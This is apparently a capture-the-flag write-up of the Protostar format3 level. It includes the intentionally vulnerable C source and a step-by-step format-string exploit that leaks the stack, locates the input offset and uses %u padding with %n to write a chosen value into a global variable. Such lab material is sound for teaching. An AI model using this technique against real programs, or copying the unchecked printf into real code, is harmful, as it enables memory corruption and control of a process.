I love testing format string vulnerabilities because they are fun. Let's get started.
Description
This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.
Format3.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
  printf(string);   /* user input is used directly as the format string */
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);

  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}
In this task, we need to set the target variable to the value 0x01025544.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "%08x"')) | ./format3 00000000 target is 00000000 :(
Test with the input value AAAA followed by a run of %08x specifiers to find where our input lands on the stack:
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format3 AAAA00000000.bffff5d0.b7fd7ff4.00000000.00000000.bffff7d8.0804849d.bffff5d0.00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78. target is 00000000 :(
41414141 (our AAAA) is located at argument position 12 😀.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%12$08x."')) | ./format3 AAAA41414141. target is 00000000 :(
Pretty good! Let's change the value, but first we need the address of the target variable, so we use objdump.
user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target
080496f4 g     O .bss   00000004              target
Exploit it
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%12$08n"')) | ./format3 �� target is 00000004 :(
target is now 4 (the four address bytes printed before the %n), but we need it to hold 0x01025544. We can use the shell's let command to get that value in decimal.
user@protostar:/opt/protostar/bin$ let x=0x01025544; echo $x;
16930116
We need to subtract the 4 bytes already written (the address that took the place of AAAA): 16930116 - 4 = 16930112. Then we use %u with that number as the field width so the byte count stored by %n comes out to exactly 0x01025544.
[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\xf4\x96\x04\x08"+"%16930112u"+"%12$08n"')) | ./format3
Bingo! We got it! Thanks for reading. Happy Hacking.